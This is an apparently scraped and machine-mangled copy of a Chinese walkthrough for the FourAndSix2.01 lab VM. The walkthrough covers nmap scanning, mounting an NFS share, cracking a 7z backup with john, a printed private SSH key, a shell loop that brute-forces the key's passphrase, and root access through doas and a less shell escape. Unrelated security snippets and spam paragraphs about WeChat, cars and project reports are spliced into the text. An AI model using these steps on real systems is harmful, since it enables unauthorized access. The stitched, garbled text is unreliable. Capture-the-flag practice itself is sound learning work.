*本文原创作者:周大涛,本文归于FreeBuf原创奖赏方案,未经许可制止转载
最近在乡间,网太慢了,只能玩玩靶机。
使命:获取root权限而且读取/root/flag.txt
设备直接导入virtualbox即可。
开端开机就可以看见靶机的IP:192.168.0.104
# nmap -n -v -Pn -p- -A 192.168.0.104...PORT STATE SERVICE REASON VERSION22/tcp &相关厂商微软针对此缝隙现已发布了安全补丁(包括那些现已不再供应技术支撑的老旧操作系统),激烈建议用户当即设备相应的补丁或其他缓解 *** 以避免遭到相关的挟制。nbsp; open ssh syn-ack ttl 64 OpenSSH 7.9 (protocol 2.0)| ssh-hostkey:| 2048 ef:3b:2e:cf:40:19:9e:bb:23:1e:aa:24:a1:09:4e:d1 (RSA)| 256 c8:5c:8b:0b:e1:64:0c:75:c3:63:d7:b3:80:c9:2f:d2 (ECDSA)|_ 256 61:bc:45:9a:ba:a5:47:20:60:13:25:19:b0:47:cb:ad (ED25519)111/tcp open rpcbind syn-ack ttl 64 2 (RPC #100000)| rpcinfo:| program version port/proto service| 100000 2 111/tcp rpcbind| 100000 2 111/udp rpcbind| 100003 2,3 2049/tcp nfs| 100003 3.病毒传达
2,3 2049/udp nf在Server 2012中默许启用远程处理才干s| 100005 1,3 809/tcp mountd|_ 100005 1,3 997/udp mountd809/tcp open mountd syn-ack ttl 64 1-3 (RPC #100005)2049/tcp open nfs syn-ack ttl 64 2-3 (RPC #100003)
发现2049端口NFS服务。
NFS服务NFS是Network File System的缩写,即 *** 文件系统。一种运用于涣散式文件系统的协议,由Sun公司开发,于1984年向外发布。功用是经过 *** 让不同的机器、不同的操作系统可以互相同享单个的数据,让应用程序在客户端经过 *** 访问坐落服务器磁盘中的数据,是在类Unix系统间完成磁盘文件同享的一种 *** 。
NFS的基本原则是“容许不同的客户端及服务端经过一组RPC同享相同的文件系统”,它是独立于操作系统,容许不同硬件及操作系统的系统一同进行文件的同享。
NFS在文件传送或信息传送过程中依赖于RPC协议。RPC,远程过程调用 (Remote Procedure Call) 是能使客户端实行其他系统中程序的一种机制。NFS自身是没有供应信息传输的协议和功用的,但NFS却能让我们经过 *** 进行材料的同享,这是由于NFS运用了一些其它的传输协议。而这些传输协议用到这个RPC功用的。可以说NFS自身便是运用RPC的一个程序。或许说NFS也是一个RPC SERVER。所以只需用到NFS的当地都要发动RPC服务,不论是NFS SERVER或许NFS CLIENT。这样SERVER和CLIENT才干经过RPC来完成PROGRAM PORT的对应。可以这么了解RPC和NFS的联系:NFS是一个文件系统,而RPC是担任担任信息的传输。
运用nmap脚本勘探可挂载目录
nmap -sV --script=nfs-showmount 192.168.0.104Nmap scan report for 192.168.0.104Host is up (0.00069s latency).Not shown: 997 closed portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.9 (protocol 2.0)111/tcp open rpcbind 2 (RPC #100000)| nfs-showmount: |_ /home/user/storage | rpcinfo: | program version port/proto将以上代码另存为hello-x64.a *** ,再在终端输入以下指令:
service| 100000 2 111/tcp rpcbind| 100000 2 111/udp rpcbind| 100003 2,3 2049/tcp nfs| 100003 2,3 2049/udp nfs| 100005 1,3 685/tcp mountd|_ 100005 1,3 869/udp mountd2049/tcp open nfs 2-3 (RPC #100003)
发现可挂载目录/home/user/storage
,挂载目录sudo nfspysh -o server=192.168.0.104:/home/user/storage /tmp/test/
可以看见一个backup.7z
的压缩包,尝试用7z解压,但是发现没有7z指令,只能将文件保存到本地再打开了:get backup.7z /tmp/
qsNw8ttnhlyM.7z解压发现要暗码?!使用john东西爆炸暗码为:chocolate
得到id_rsa。
-----BEGIN OPENSSH PRIVATE KEY-----b3BlbnNzaC1rZXktdjEAAAAACmFlczI1Ni1jdHIAAAAGYmNyeXB0AAAAGAAAABCmv/BkXUN5gfqui9Z/92KAAAAAEAAAAAEAAAEXAAAAB3NzaC1yc2EAAAADAQABAAABAQDClNemaX//nOugJPAWyQ1aDMgfAS8zrJh++hNeMGCo+TIm9UxVUNwc6vhZ8apKZHOX0Ht+MlH *** dkbwSinmCRmOkm2JbMYA5GNBG3fTNWOAbhd7dl2GPG7NUD+zhaDFyRk5gTqmuFumECDAgCxzeE8r9jBwfX73cETemexWKnGqLey0T56VypNrjvueFPmmrWCJyPcXtoLNQDbbdaWwJPhF0gKGrrWTEZo0NnU1lMAnKkiooDxLFhxOIOxRIXWtDtc61cpnnJHtKeO+9wL2q7JeUQB00KLs9/iRwV6b+kslvHaaQ4TR8IaufuJqmICuE4+v7HdsQHslmIbPKX6HANnAAADwAO39g1ZtgarNJ4hcnHTgx/DLgDeet1AhvBBsVjk94i8WLhy0luUvigJcMwHY6MgxL/ZNJfe3cZZ2/Rpo5g5j5fzQ8vBHlglN9Z1GPVmeKdUHpRzrLFuARQOitYiWn9suwVafhgTS1hAof3Fqsik3pogEnqp9pm39lalPVNgNVj6HCr2iJ0iq/MXjAmbgYxvpYXhzjyGzfPRlsw3y1T0pIxq3y9AzVBzBCWF9x/GS1mXiDvGbNyb21ymn+NJq1eZKBN2LGJOHV2v+GGBkRTIYDsUpRbN56OJgu7FyksECQIARA3ngs7tJhkGwtU7tIihiw/JlRtNu3GZwEsd5RVyX6cK8xGuaqlUulmm5E1CnxXz3zj8MNhZtpDJaTpda83BhkxkSYb2svJ5rqO8HTYX2XtvPBEAN3U/dbcYVwNIdJ77TmckvStqvWi+DlZ6SL5Jlsj3WIFwXrmSIUQATA0jcF4d/FOoYOFTAQJ1y2pm97Q8UCErizu+SjfRyQ7Q7QERsuAWBKthTGWkmzWKTYG8cpKso4lwbbjKJapfovEDtJgtFZpaX2+2YMMBx5AtaUwN *** hNYfIan4d8E2l6R77bBjqff4Qk1EMZzyXhG/Qe63buiCpUk6EevAf5Z2LXHJa4JYW *** VcSXL3pbAOKEt6c36Q7CMHLmgOR9Be9wU/G+0FkDhdcgdkfOHaROfbK+RLhZ9tMO2peFPPOba2/Mw/kIK2Tepw7dQMvZ8KU+rBISeTE0YoSNYpt5A7ClskeLsXh9KCA/6Glnw+xKS+KewK2ooDck0EwHUmVQqC4qkXzbPbcj37WwMO3mzcQo7MARluOX8Y5b6JReqdhzvM5S7/uObcIblXwq9h71gTPirzhnn9QaJ/DnbGX4Ww7m8nkFkf9qwghWM+vKMjTxGSFHFXubk8l+5CGfAOYC1igZMjKO5+2u60LMhtPjkGdUMbq0hv2FCxZW1ajlGwZIYWs2MLW7LGVSwC7re+fM21RaMxWvn73VjjooB+7hexe7l35mr5TyaZcQKCt *** NQRrGsSxHLUTEtv *** 9FHOCnLgcsUziTm826t9dvsrYHJh8W/wSqSYQ9t1niLg2MulioK6H8FTDAupkhZUkkbL0FEbe+Dl3cIeUW6nXgaf6F+9tQHNQCI9QT1a/kGSGgQRRjuSdmVZieqdafJ7jHavLjzjcsiKQtjzkyaCp1hpadS6IZqF9DzlbtJRNlrO6Tq3j7gtL4DCURx2Jq13JO1hWDffIyrRZfgGeovGK/UAbTeTQ9MrPy1AS6A==-----END OPENSSH PRIVATE KEY-----
id_rsa.pub:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDClNemaX//nOugJPAWyQ1aDMgfAS8zrJh++hNeMGCo+TIm9UxVUNwc6vhZ8apKZHOX0Ht+MlH *** dkbwSinmCRmOkm2JbMYA5GNBG3fTNWOAbhd7dl2GPG7NUD+zhaDFyRk5gTqmuFumECDAgCxzeE8r9jBwfX73cETemexWKnGqLey0T56VypNrjvueFPmmrWCJyPcXtoLNQDbbdaWwJPhF0gKGrrWTEZo0NnU1lMAnKkiooDxLFhxOIOxRIXWtDtc61cpnnJHtKeO+9wL2q7JeUQB00KLs9/iRwV6b+kslvHaaQ4TR8IaufuJqmICuE4+v7HdsQHslmIbPKX6HANn user@fourandsix2
使用脚本爆炸出暗码:
cat /home/threst/Pentest/字典/password.txt | while read pass; do if ssh-keygen -c -C “user@192.168.0.105” -P $pass -f id_rsa &>/dev/null; then echo $pass; break; fi; done
得到暗码12345678
:
留意:这儿我重启了虚拟机,所以ip变成了192.168.0.105。
发现不能直接访问root文件夹,所以检查/etc
目录,有doas.conf
关于大都用sudo仅仅为了不必记root暗码的个人电脑用户来说,和杂乱的sudo比较,来自OpenBSD的doas愈加细巧(sudo编译后的体量是doas的五倍),配备愈加简略,某种程度上也愈加安全(很明显,代码越多,有缝隙的几率就越大,这也是OpenBSD的规划所根据的理论)。其作者在由于sudo杂乱而常常改变配备格局头疼之后规划出了doas,现在现已被移植到Linux。配备格局很简略,要容许wheel组的用户用doas以root权限工作指令,只需用root用户在/etc/doas.conf
写上:
permit :wheel
然后就可以像用sudo相同用它了。
输入doas /usr/bin/less /var/log/authlog
检查日志:
输入v
,进入修改形式,输入:!/bin/sh
取得root权限,检查flag:acd043bc3103ed3dd02eee99d5b0ff42
*本文原创作者:周大涛,本文归于FreeBuf原创奖赏方案,未经许可制止转
黑客软件qq:FourAndSix2.01靶机浸透
DWORDLONG FileReferenceNumber; }运用这种COM方针递归搜索 *** ,我们可以发现能用于代码实行的COM方针,这也是调用已知COM方针 *** 的新 *** 。这些COM方针 *** 可以用来绕过不同的检测机制,也可以用于横向渗透使射中。FourAndSix2.01靶机渗透
黑客软件qqvar InputStreamReader = Java.type("java.io.InputStreamReader");3、 看清单文件,静态注册了哪些广播接收器没有静态注册广播二、病毒分析
ms:script implements-prefix="user" language=" *** cript"> ptrace(PTRACE_TRACEME, 0, 0, 0);而问题的根柢就出在.*.?2012年9月,LIFX姓名开始于Kickstarter众筹途径,该产品刚开始在众筹途径上线就受到了投资者们的喜爱,其召募到的资金是其原始目的资金的13倍以上。黑客软件qq
strict_chain2.央求照应主体内容或头信息的关键字匹配VMware Workstation和Fusion中的拖放(DnD)功用含有越界内存访问缝隙。 这会容许访客在工作Workstation或Fusion的操作系统上实行代码。
/etc/passwd ##用户信息users_entry = pwd.getpwall()Lynis扫描系统的配备,并创建概述系统信息与安全问题所运用的专业审计,一同它也是一款开源审计东西,Lynis可以工作在几乎全部的Unix版别上,例如可在AIX、FreeBSD、HP-UX、Linux、Mac OS、NetBSD、OpenBSD、Solaris等系统环境下工作。甚至还可以工作在Raspberry Pi(树莓派)或许QNAP的存储设备上。值得留意的是,该东西由一系列的shell脚本构成,并具有通用性揭穿许可证(GPL)。FourAndSix2.01靶机渗透
黑客软件qq6-禁用USB存储设备不过这款软件是收费的,分为很多个版别,企业版,标准版,服务器版和Mac版。 选用思科 HyperFlex HX240c M4 节点的容量密集型集群:此配备包括最少三个节点、最多 23 个 1.2 TB SAS 驱动器(用于供应集群存储容量)、一个 120 GB SSD 元数据驱动器、一个 1.6 TB SSD 缓存驱动器,以及两个 64GB 充当引导驱动器的 SD 卡。
}不论你的Android设备是自己root的,仍是在刷入第三方ROM的时分现已提前root好的,或许是设备意外感染了恶意软件,SafetyNetAPI都可以直接检测出来。假设SafetyNet检测到了系统文件或许用户权限被篡改正,那么它将会阻遏系统访问特定的APP。set mailserver *** tp.sendgrid.net port 587 username "" password "" using tlsv12Connection黑客软件qq
bDescriptorType 1 r6 0x10324 66340
只需你保存有暗码,Truecrypt的加密容器可以在任何系统上挂载解密。在学会运用truecrypt往后,信赖小伙伴们可以更好的保护自己的钱包文件和各种隐私了。
FourAndSix2.01靶机渗透但是,我们不能必定Enrica商船配备的是否是VR-3000。这儿备注一下,该船舶制造于2008年,而Furuno的VR-3000是于2007年发布的。
假设全部东西都正常工作,你应该可以得到以下 *** ON: "size"=>42,微信备份的聊天记录怎么查看?随着时代的进步,大家更换新手机的速度也越来越快,换手机很简单,但随之而来的问题就是数。 如何恢复微信聊天记录?我们每天都在使用微信进行聊天,产生了大量的聊天信息。这些信息中...
开着还行,前几天我们做了8小我私家跑山路,动力照样猛 7万落地的话,长安欧尚X70A照旧很推荐的,同级别车中7万能买到几多钱的险些没有,长安欧尚X70A的售价照旧很本心的,根基上是这个价位中最...
高中生挣多少钱一个月啊,早恋如能善意处理的加以引导。或者一起玩耍从人际关系杜绝上看,会让成绩下降。学习早恋怎么父母真的算早恋,要疏导。相信你的早恋是杜绝会受益匪浅甚至永远不会失恋,小学早恋很难说你们处...
近日,研究人员在美国黑帽大会2018上展示了一个新的漏洞利用程序,可让攻击者远程入侵苹果Mac电脑。 苹果Mac新MDM漏洞可招致远程攻击 据悉,利用该漏洞黑客可能会在用户首次登录新M...
此刻的社会中餐饮行业已经成为了一大巨头,现如今有着外卖的辅佐餐饮行业成长的越来越好,此刻就是足不出户而吃尽天下美食,足以看出各人对付美食的热爱,而创业者们也同样发明白这一现象,所以创业者们就想要插手到...
作为一个合格的项目经理,每周向公司领导及甲方监理汇报每周项目情况是必须的,项目周报,其实蛮常见的,没有写过项目周报的项目经理应该没有吧。写项目周报主要目的让相关干系人了解项目细节,不让项目成为一个黑盒...